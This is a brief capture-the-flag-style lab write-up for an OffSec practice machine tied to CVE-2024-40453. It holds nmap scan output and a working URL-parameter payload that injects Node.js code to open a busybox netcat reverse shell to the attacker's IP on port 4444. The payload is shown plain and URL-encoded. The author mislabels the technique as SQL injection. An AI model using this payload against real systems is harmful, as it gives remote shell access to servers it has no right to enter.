CVE-2024-40453
00 min
2025-3-23
Source
https://portal.offsec.com/labs/practice
Date
Mar 20, 2025 → Mar 20, 2025
Tag
Nmap
SQLI
Web Exploitation

192.168.247.102

Nmap

─# nmap -sT -p- --min-rate 5000 $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 06:07 EDT Nmap scan report for 192.168.247.102 Host is up (0.076s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 83/tcp filtered mit-ml-dev 3000/tcp open ppp 5079/tcp filtered cp-spxrpts 44808/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 17.51 seconds
└─# nmap -sU -p- --min-rate 5000 $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 06:07 EDT Warning: 192.168.247.102 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.247.102 Host is up (0.060s latency). All 65535 scanned ports on 192.168.247.102 are in ignored states. Not shown: 65385 open|filtered udp ports (no-response), 150 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 145.04 seconds

3000

notion image
notion image
nothing found
we try to search CVE-2024-40453 and we find this page
Squealer (Advanced)
Squealer echoCTF Machine
Squealer (Advanced)
https://shuciran.github.io/posts/Squealer/
Squealer (Advanced)
after check we trying to sqli the website
http://192.168.247.102:3000/?search=1&varName=console.log("x")
notion image
http://192.168.247.102:3000/?useWith=1&varName={ a: b = global.process.mainModule.require("child_process").execSync("busybox nc 192.168.45.158 4444 -e /bin/bash") }
?useWith=1&varName=%7B%20a:%20b%20=%20global.process.mainModule.require(%22child_process%22).execSync(%22busybox%20nc%20192.168.45.158%204444%20-e%20/bin/bash%22)%20%7D
notion image
 
上一篇
HB
下一篇
AZ-900